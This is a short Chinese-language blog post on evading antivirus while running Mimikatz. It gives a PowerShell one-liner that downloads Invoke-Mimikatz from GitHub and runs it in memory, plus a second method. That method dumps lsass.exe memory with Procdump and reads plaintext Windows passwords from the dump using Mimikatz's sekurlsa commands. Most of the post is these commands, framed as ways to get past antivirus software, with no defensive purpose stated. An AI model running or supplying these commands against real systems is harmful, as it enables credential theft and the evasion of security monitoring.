Mimikatz免杀

Powershell

由于Powershell天然免杀,我们可以直接用Powershell命令去加载相应的脚本,下载后执行。这种方法是在内存中直接加载,能够绕过杀软的检测。

powershell IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1'); Invoke-Mimikatz

Procdump + Mimikatz

今天事实上我用的是第二种方法,因为在加载Powershell时意外报了一个句柄错误,查资料也都是一头雾水,感觉好像就只有我碰到了这个问题,后来发现了一种方法,也能够绕过杀软

第一步,上传Procdump到服务器,Procdump是一个Windows Debug工具,而且是微软爸爸官方提供的,所以无论如何杀软都不会把这货列进黑名单的

procdump.exe -accepteula -ma lsass.exe lsass.dmp

使用该命令来dump下lsass.exe进程的内存数据,并保存至lsass.dmp文件,然后为了绕过杀软,我们把这个数据包下载到本地来分析

使用Mimikatz来进行数据读取

sekurlsa::minidump lsass.dmp
sekurlsa::logonPasswords full

即可提取到明文密码

發佈留言

發佈留言必須填寫的電子郵件地址不會公開。 必填欄位標示為 *